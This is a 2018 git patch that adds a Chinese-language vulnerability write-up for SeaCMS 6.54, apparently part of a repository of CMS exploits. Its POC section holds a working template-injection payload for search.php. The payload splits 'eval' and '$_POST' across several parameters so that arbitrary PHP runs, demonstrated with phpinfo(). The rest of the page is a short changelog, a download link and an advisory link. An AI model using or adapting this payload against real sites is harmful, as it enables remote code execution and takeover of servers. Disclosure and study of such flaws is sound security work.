From 446443bf41def49f21702a1f2d0b43fa63926e84 Mon Sep 17 00:00:00 2001
From: sie504 <python2017@sina.com>
Date: Wed, 18 Jul 2018 22:26:49 +0800
Subject: [PATCH] seacms

---
 .../readme.md"                                |  2 +-
 .../seacms6.55.md"                            |  0
 .../seacms6.54.md"                            | 49 +++++++++++++++++++
 3 files changed, 50 insertions(+), 1 deletion(-)
 rename "seacms/seacms 6.55 \344\273\243\347\240\201\346\263\250\345\205\245\346\274\217\346\264\236/seacms6.55.md" => "seacms/seacms 6.55 \344\273\243\347\240\201\346\211\247\350\241\214/seacms6.55.md" (100%)
 create mode 100644 "seacms/seacms6.54\344\273\243\347\240\201\346\211\247\350\241\214/seacms6.54.md"

diff --git "a/seacms/SeaCMS v6.45\345\211\215\345\217\260Getshell \344\273\243\347\240\201\346\211\247\350\241\214/readme.md" "b/seacms/SeaCMS v6.45\345\211\215\345\217\260Getshell \344\273\243\347\240\201\346\211\247\350\241\214/readme.md"
index 7da1279..2e63a98 100644
--- "a/seacms/SeaCMS v6.45\345\211\215\345\217\260Getshell \344\273\243\347\240\201\346\211\247\350\241\214/readme.md"	
+++ "b/seacms/SeaCMS v6.45\345\211\215\345\217\260Getshell \344\273\243\347\240\201\346\211\247\350\241\214/readme.md"	
@@ -1,4 +1,4 @@
-##  Affected Version
+##  Affected Version 6.45
 
  下载地址：
 
diff --git "a/seacms/seacms 6.55 \344\273\243\347\240\201\346\263\250\345\205\245\346\274\217\346\264\236/seacms6.55.md" "b/seacms/seacms 6.55 \344\273\243\347\240\201\346\211\247\350\241\214/seacms6.55.md"
similarity index 100%
rename from "seacms/seacms 6.55 \344\273\243\347\240\201\346\263\250\345\205\245\346\274\217\346\264\236/seacms6.55.md"
rename to "seacms/seacms 6.55 \344\273\243\347\240\201\346\211\247\350\241\214/seacms6.55.md"
diff --git "a/seacms/seacms6.54\344\273\243\347\240\201\346\211\247\350\241\214/seacms6.54.md" "b/seacms/seacms6.54\344\273\243\347\240\201\346\211\247\350\241\214/seacms6.54.md"
new file mode 100644
index 0000000..1c5fddc
--- /dev/null
+++ "b/seacms/seacms6.54\344\273\243\347\240\201\346\211\247\350\241\214/seacms6.54.md"
@@ -0,0 +1,49 @@
+## Affected Version 6.54
+
+链接:https://pan.baidu.com/s/16rV0_xnoN_8-v4WVpCq6YA  
+
+密码:qlwh
+
+
+
+6.54 和6.53版本的不同之处是在：
+
+`search.php`的65行的`order`参数做了限制。
+
+`$order = ($order == "commend" || $order == "time" || $order == "hit") ? $order : "";`
+
+
+
+```
+更新日期：2017年8月7日 v6.54
+修复：紧急修复2处高危安全漏洞
+
+更新日期：2017年8月6日 v6.53
+新增：微信公众平台模块
+优化：采集逻辑
+修复：部分文字描述错误
+更新日期：2017年2月18日 v6.46
+修复：两处安全问题
+
+更新日期：2017年2月6日 v6.45
+修复：一处安全问题
+```
+
+​	
+
+## POC
+
+
+
+    http://192.168.0.6/seacms654/search.php
+    POST：
+    searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();
+
+
+
+## References
+
+[漏洞预警 | 海洋CMS（SEACMS）0day漏洞预警](http://www.freebuf.com/vuls/150042.html)
+
+
+